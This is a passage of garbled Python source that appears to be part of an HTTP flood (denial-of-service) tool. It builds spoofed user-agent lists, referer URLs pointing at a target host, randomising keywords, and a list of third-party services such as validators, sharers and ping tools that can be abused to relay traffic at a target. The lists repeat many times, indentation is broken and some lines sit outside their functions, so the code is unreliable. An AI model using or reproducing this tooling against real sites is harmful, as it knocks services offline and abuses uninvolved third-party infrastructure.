headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;')
headers_useragents.append('Version/4.0 Safari/534.30')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;')
headers_useragents.append('VS840 4G Build/GRK39F)')
headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)')
headers_useragents.append('Version/4.0 Mobile Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')
headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
    headers_referers.append('http://' + host + '/')
    return headers_referers
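# Hedged helper sketch (not part of the original script): the lists in this
# file are built by long runs of repeated append calls, so a small
# order-preserving de-duplication step could guard against accidental
# repeats. Assumes Python 3.7+, where dict preserves insertion order.
def unique_in_order(items):
    # dict.fromkeys keeps only the first occurrence of each entry while
    # preserving the order in which entries were appended.
    return list(dict.fromkeys(items))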
# generates a Keyword list
def keyword_list():
    global keyword_top
    keyword_top.append('Ecosistema')
    keyword_top.append('Suicide')
    keyword_top.append('Sex')
    keyword_top.append('<NAME>')
    keyword_top.append('World Cup')
    keyword_top.append('Ca Si Le Roi')
    keyword_top.append('Ebola')
    keyword_top.append('Malaysia Airlines Flight 370')
    keyword_top.append('ALS Ice Bucket Challenge')
    keyword_top.append('Flappy Bird')
    keyword_top.append('Conchita Wurst')
    keyword_top.append('ISIS')
    keyword_top.append('Frozen')
    keyword_top.append('2014 Sochi Winter Olympics')
    keyword_top.append('IPhone')
    keyword_top.append('Samsung Galaxy S5')
    keyword_top.append('Nexus 6')
    keyword_top.append('Moto G')
    keyword_top.append('Samsung Note 4')
    keyword_top.append('LG G3')
    keyword_top.append('Xbox One')
    keyword_top.append('Apple Watch')
    keyword_top.append('Nokia X')
    keyword_top.append('Ipad Air')
    keyword_top.append('Facebook')
    keyword_top.append('Anonymous')
    keyword_top.append('DJ Bach')
    keyword_top.append('adidas')
    keyword_top.append('ask.fm')
    keyword_top.append('adele')
    keyword_top.append('5x nexus')
    keyword_top.append('espn')
    keyword_top.append('uggs')
    keyword_top.append('uber')
    keyword_top.append('american eagle')
    keyword_top.append('jessica simpson')
    keyword_top.append('jacket')
    keyword_top.append('anderson east')
    keyword_top.append('kroger')
    return keyword_top
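# Hedged usage sketch (not in the original script): one way the two lists
# above might be combined into a Referer header value. The function name
# random_referer and the URL-encoding step are illustrative assumptions; it
# presumes referer_list() and keyword_list() have populated the globals and
# assumes Python 3 (urllib.parse).
import random
import urllib.parse

def random_referer():
    # Pair a random search-engine URL with a random, URL-encoded keyword so
    # each request looks like it arrived from a different search query.
    return random.choice(headers_referers) + urllib.parse.quote(random.choice(keyword_top))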
def bots():
    # NOTE: `global bots` plus `bots = []` rebinds the module-level name from
    # this function to the list, so bots() only works on its first call.
    global bots
    bots = []
    bots.append("http://validator.w3.org/check?uri=")
    bots.append("http://www.facebook.com/sharer/sharer.php?u=")
    bots.append("http://downforeveryoneorjustme.com/")
    bots.append("http://network-tools.com/default.asp?prog=ping&host=")
    bots.append("http://network-tools.com/default.asp?prog=trace&host=")
    bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
